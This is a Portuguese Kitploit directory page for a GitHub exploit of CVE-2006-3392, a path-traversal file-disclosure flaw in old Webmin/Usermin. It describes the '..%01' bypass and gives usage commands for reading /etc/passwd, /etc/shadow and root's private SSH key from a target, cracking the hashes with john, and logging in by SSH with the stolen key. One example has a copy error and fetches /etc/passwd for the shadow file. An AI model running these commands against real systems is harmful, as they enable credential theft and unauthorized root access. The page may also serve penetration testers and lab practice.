Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - Divulgação arbitrária de arquivos | Kitploit
Ferramentas/GitHubGitHub/g1vi/cve-2006-3392
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - Divulgação arbitrária de arquivos

Ver Repositório
12há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin anterior a 1.290 e Usermin anterior a 1.220 chama a função simplify_path antes de decodificar HTML, o que permite que atacantes remotos leiam arquivos arbitrários, conforme demonstrado usando sequências "..%01", que contornam a remoção de sequências "../" antes que bytes como "%01" sejam removidos do nome do arquivo. NOTA: Este é um problema diferente do CVE-2006-3274.

Uso

Navegue por qualquer arquivo no sistema de arquivos com privilégio de root

root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>

Exemplos

Navegue por passwd e shadow em 10.10.11.105, faça unshadow e quebre os hashes

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed

Navegue pela chave rsa privada em 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

Licença

Sinta-se à vontade para usar ou modificar quando e onde quiser

Baixar ferramenta